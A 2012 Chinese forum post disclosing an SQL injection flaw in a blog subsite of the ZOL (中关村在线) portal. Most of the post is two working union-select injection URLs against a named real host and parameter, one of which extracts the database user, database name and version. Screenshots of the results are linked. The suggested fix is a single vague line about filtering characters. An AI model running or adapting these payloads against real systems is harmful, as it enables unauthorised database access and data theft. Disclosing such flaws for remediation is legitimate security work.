从百草园干到三味书屋 發表於 2012-7-7 17:55:25

中关村在线博客子站SQL注入及修复方案

<br />http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--&nbsp;<br />&nbsp;<img alt="" src="https://img.jbzj.com/file_images/article/201207/201207071755298.jpg" /><br />&nbsp;http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--&nbsp;<br /><img alt="" src="https://img.jbzj.com/file_images/article/201207/201207071755299.jpg" /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201207/2012070717552910.jpg" /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201207/2012070717552911.jpg" /><br />修复方案:<br />过滤参数提交非法字符或者拦截敏感字符等等。。。&nbsp;
頁: [1]
查看完整版本: 中关村在线博客子站SQL注入及修复方案